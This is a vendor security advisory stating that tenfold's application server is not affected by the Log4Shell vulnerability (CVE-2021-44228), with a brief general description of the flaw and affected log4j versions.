Security Update: Impact of CVE-2021-44228 on tenfold products

On 9 December 2021 CVE-2021-44228, a zero-day vulnerability known as Log4Shell was published. The vulnerability allows for remote execution through log messages utilizing a formatted string using “${}”. This string causes a lookup that will retrieve and execute a file from a remote location. When triggered, this vulnerability can download and execute malicious code. The first proof of concept to exploit the vulnerability was published on 9 December 2021. As of today, large-scale scanning efforts for the vulnerability have already been observed in the wild. (Details)

log4j versions 2.14.1 and below are affected by CVE-2021-44228. The behavior has been removed by default in log4j version 2.15.0.

The latest impact analysis by our security experts indicates that tenfold Application Server is not affected by the vulnerability.

tenfold is built on top of WildFly Application Server and uses the jboss-logmanager facility for application logging. This component does not depend on the org.apache.logging.log4j:log4j-core library and thus is not affected by CVE-2021-44228 (See official statement)

Our security experts will continue to observe the situation and react, if necessary. We recommend to always upgrade to the latest software version to effectively protect your environment from security incidents.

If you have any questions regarding this statement, feel free to contact us at support@tenfold-security.com